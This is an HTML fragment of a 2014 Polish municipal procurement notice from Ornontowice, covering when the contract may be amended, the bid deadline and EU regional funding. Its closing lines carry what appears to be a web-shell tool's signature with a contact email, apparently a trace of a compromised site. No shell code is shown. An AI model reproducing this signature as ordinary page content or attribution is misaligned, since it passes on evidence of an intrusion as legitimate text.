<p>1. Zamawiająca przewiduje możliwość istotnych zmian postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.-  Zmiana postanowień niniejszej umowy może nastąpić jedynie wtedy, gdy nie jest ona sprzeczna z ustawą Prawo zamówień publicznych. 
- Dopuszcza się możliwość dokonania istotnych zmian postanowień umowy w stosunku do treści oferty, jeżeli konieczność wprowadzenia takich zmian wynika ze zmiany umowy z głównym wykonawcą robót budowlanych oraz następujących okoliczności:1) Zmiany terminu realizacji przedmiotu umowy, w następstwie:  siły wyższej - rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności a które uniemożliwia Wykonawcy wykonanie przedmiotu umowy. W razie wystąpienia siły wyższej Strony umowy zobowiązane są dołożyć wszelkich starań w celu ograniczenia do minimum opóźnienia w wykonywaniu swoich zobowiązań umownych, powstałego na skutek działania siły wyższej. Pod pojęciem siły wyższej rozumie się w szczególności zdarzenia i okoliczności takie jak: klęska żywiołowa, działania wojenne, terroryzm, rewolucja, zamieszki, strajk spowodowany przez inne osoby nie związane z realizacją inwestycji itp.;
	2) niekorzystnych warunków atmosferycznych uniemożliwiających wykonanie robót, co wymaga potwierdzenia przez inspektora nadzoru stosownym wpisem do Dziennika Budowy (nie dotyczy warunków atmosferycznych typowych dla pory roku);3) wystąpienie niewypałów, niewybuchów, innych przedmiotów stanowiących zagrożenie;4) wystąpienie wykopalisk archeologicznych, itp.; 5) okoliczności leżących po stronie Zamawiającej i nie wynikających z przyczyn leżących po stronie Wykonawcy (np. wstrzymanie, zawieszenie, przerwa w realizacji Inwestycji). 
Termin wykonania umowy ulega odpowiednio zmianie o okres trwania okoliczności celem ukończenia przedmiotu umowy w sposób należyty. Zmiana terminu realizacji Inwestycji nie wpływa na zmianę wynagrodzenia. 6) Zmiany wynagrodzenia, w następstwie zmiany będącej skutkiem działań organów państwowych; (ustawowa zmian obowiązującej stawki podatku VAT lub wprowadzenie nowego podatku, dewaluacja złotego powyżej 15% rocznie);
7) Zmiana osób wyznaczonych do realizacji umowy, ze strony Zmawiającej w przypadku braku możliwości nadzoru przez te osoby, zmiana ta nie wymaga zawarcia aneksu do umowy; 8) Zmiana danych związana z obsługą administracyjno - organizacyjną umowy, (danych teleadresowych Wykonawcy; Zamawiającego), zmiana ta następuje poprzez pisemne zgłoszenie tego faktu drugiej stronie i nie wymaga zawarcia aneksu do umowy; 2. Wszelkie zmiany i uzupełnienia niniejszej umowy dokonane w sposób zgodny z ustawą Prawo zamówień publicznych wymagają formy pisemnej pod rygorem nieważności - aneks do umowy, z zastrzeżeniem przypadków określonych w niniejszym punkcie, w których wskazano, że nie jest wymagane zawarcie aneksu do umowy. Zmiana umowy dokonana z naruszeniem przepisów ustawy Prawo zamówień publicznych jest nieważna.3. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają aneksu sporządzonego z zachowaniem formy pisemnej pod rygorem nieważności.4. Dopuszcza się możliwość zmiany umowy w zakresie terminu, jeżeli w czasie realizacji zadania wystąpią okoliczności  uniemożliwiające jego realizację, z winy Zamawiającej - termin wydłuża się o czas przestoju lub jeżeli miały miejsce utrudnienia w uzyskaniu uzgodnień.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ornontowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Ornontowice, ul. Zwycięstwa 26a, 43-178 Ornontowice, pok.320..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.07.2014 godzina 11:30, miejsce: Urząd Gminy Ornontowice, ul. Zwycięstwa 26a, 43-178 Ornontowice, pok.320..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 Priorytet VI. Zrównoważony rozwój miast Działanie 6.2. Rewitalizacja obszarów zdegradowanych Poddziałanie 6.2.2. Rewitalizacja - małe miasta..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com